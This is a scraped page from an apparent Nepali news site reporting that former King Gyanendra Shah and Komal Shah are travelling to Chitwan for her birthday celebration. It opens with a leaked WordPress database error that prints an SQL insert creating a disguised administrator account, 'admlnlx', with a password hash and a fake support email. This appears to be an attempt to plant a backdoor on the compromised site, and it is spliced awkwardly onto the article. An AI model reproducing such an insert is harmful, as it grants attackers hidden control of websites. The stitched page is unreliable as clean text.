WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2C0lCYiq/GV6xQl7X/b9TzBIoFYY/0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 05:33:10', '', 'admlnlx', 'admlnlx')
चितवन, फागुन ६–
पूर्व राजा ज्ञानेन्द्र शाह र पत्नी कोमल शाह आज चितवन आउँदै हुनुहुन्छ । पूर्व राजा ज्ञानेन्द्र पत्नी कोमलको जन्मोत्सव मनाउन पूर्वराज परिवार चितवन आउन लाग्नु भएको हो । केहीबेरमा उहाँहरुलाई भरतपुरस्थित चौविसकोठी चोकमा भव्य स्वागतको तयारी गरिएको छ । उहाँहरुले बाराको सिमराबाट गाडीमा चितवन आउन लाग्नु भएको हो ।